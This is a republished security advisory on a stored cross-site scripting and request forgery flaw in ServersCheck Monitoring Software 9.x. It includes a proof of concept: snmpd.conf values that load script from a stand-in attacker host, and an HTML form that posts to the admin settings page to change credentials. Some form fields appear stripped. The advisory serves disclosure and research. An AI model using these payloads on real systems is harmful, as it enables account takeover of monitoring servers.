ServersCheck Monitoring Software Script Insertion Vulnerability

Published: 2012-10-12
Updated: 2012-10-16

Affected systems:
ServersCheck Monitoring Software 9.x
Description:
--------------------------------------------------------------------------------
ServersCheck Monitoring Software is network and server monitoring software.

ServersCheck Monitoring Software contains a security vulnerability: input passed through the "syslocation" and "syscontact" parameters is displayed to users without being properly sanitised, which can be exploited to insert arbitrary HTML and script code.

<*Source: loneferret
 
  Link:
       
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!

# PoC:
# Stored XSS & Cross Site Request Forgery
# The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
# JavaScript file.
# ..
# syslocation <script src="https://attacker/xss.js"></script>
# syscontact <iframe src="https://attacker/scheck-csrf.html"></iframe>

# CSRF PoC:
# We can also use the previous XSS to trigger this. Makes for a funny.
# Change Admin credentials
# File scheck-csrf.html
<html>
<body>
<script>
        function trigger() {
                document.getElementById('bad_form').submit();
        }
</script>
<form method="post" action="http://target:1272/settings2.html">
  <input value="secure" type="hidden">
  <input value="SECURE" type="hidden">
  <input value="ok" type="hidden">
  <input value="SECURE" type="hidden">
  <input size="30" value="loneferret" type="hidden"><br>
  <input size="30" value="123456" type="hidden"><br>
</form>
</body>
</html>

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

ServersCheck Monitoring Software
--------------------------------
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:


Please cite the source when reprinting: https://www.heiqu.com/wyfsxz.html